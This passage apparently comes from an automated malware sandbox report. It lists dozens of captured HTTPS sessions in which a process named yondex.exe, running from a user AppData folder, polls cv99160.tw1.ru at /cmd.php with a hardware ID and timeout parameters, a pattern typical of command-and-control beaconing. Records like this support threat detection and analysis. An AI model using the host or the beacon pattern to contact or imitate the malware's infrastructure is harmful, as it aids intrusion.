                                                                              2024-06-23 09:32:52 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=2199943918ccab9b9225a000278e1093; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:52 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              68192.168.2.44981092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:55 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:55 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=6e26223efec701f05de49b581bf1c7ad; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              69192.168.2.44981192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:56 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:56 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=7883bb3e1054918d511549afdc466b9e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:56 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              70192.168.2.44981292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:59 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:59 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0f0d882731242f3c6d179aff9f82576c; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              71192.168.2.44981392.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:00 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:00 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=8afc26dc924f8c0b5358d993127a81d9; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:00 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              72192.168.2.44981492.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:02 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:02 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=03f34a72b3562e32974755aa7dd59028; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              73192.168.2.44981592.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:03 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:03 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=aacb6779417c2cf709e014f0dcecea4e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:03 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              74192.168.2.44981692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:05 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:05 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:05 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c3083dc6113ac723f23bb78d31ecc01a; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              75192.168.2.44981792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:06 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:07 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=85fd0b84153e5f74614f2b9642535cb2; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:07 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              76192.168.2.44981892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:08 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:08 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=6ce9248e322e45b5baad9882989bb835; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              77192.168.2.44981992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:09 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:09 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c259eaad96de6d792f192467ffb994f5; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:09 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              78192.168.2.44982092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:11 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:11 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=058b61a51c4f8b5a68e6eb220de6a117; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              79192.168.2.44982192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:12 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:12 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=ac8dad0339d94104b81f2138c8a44a61; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:12 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              80192.168.2.44982292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:13 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:14 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=b2e767fd7fbb40c1d66e8cddddda9183; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              81192.168.2.44982392.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:14 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:15 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e9229ac33942c9e772ad92f8ca6eaa54; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              82192.168.2.44982492.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:16 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:16 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=2abe1135ffe9c0f94cc815b32a851375; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:16 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              83192.168.2.44982692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:17 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:17 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:17 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=506a84dd472265c66e27cf522d872994; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              84192.168.2.44982792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:18 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:18 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=6145004982c0e3cadb6b253f92bae506; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:18 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              85192.168.2.44982892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:19 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:20 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:20 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=39663e3f8122190ce5b90d2b90a93917; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              86192.168.2.44982992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:23 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:23 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:23 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=158bcf7829f0a385de71cfcc080cdf66; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              87192.168.2.44983092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:24 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:24 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:24 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c31e6d09781a29b4bb3f57c83a253833; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:24 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              88192.168.2.44983192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:27 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:28 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:28 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=17cff0905b837661deca5e9f59e623fb; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              89192.168.2.44983292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:29 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:29 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1b833358338339ee9e639a450ee0691b; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:29 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              90192.168.2.44983392.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:32 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:32 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:32 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=487bb92847b35f60a71dc3771110a213; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              91192.168.2.44983492.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:33 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:34 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:33 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0fae2210cfb3762cda62a65c77170b71; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:34 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              92192.168.2.44983592.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:37 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:38 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:38 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0530a8ad29f61a63f6f73a10135f8627; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              93192.168.2.44983692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:39 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:39 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:39 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=9ded875ca8c6cabc1f095e5648a11911; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:39 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              94192.168.2.44983792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:33:41 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:41 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=30bc2876f36a496f4892baee64804625; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


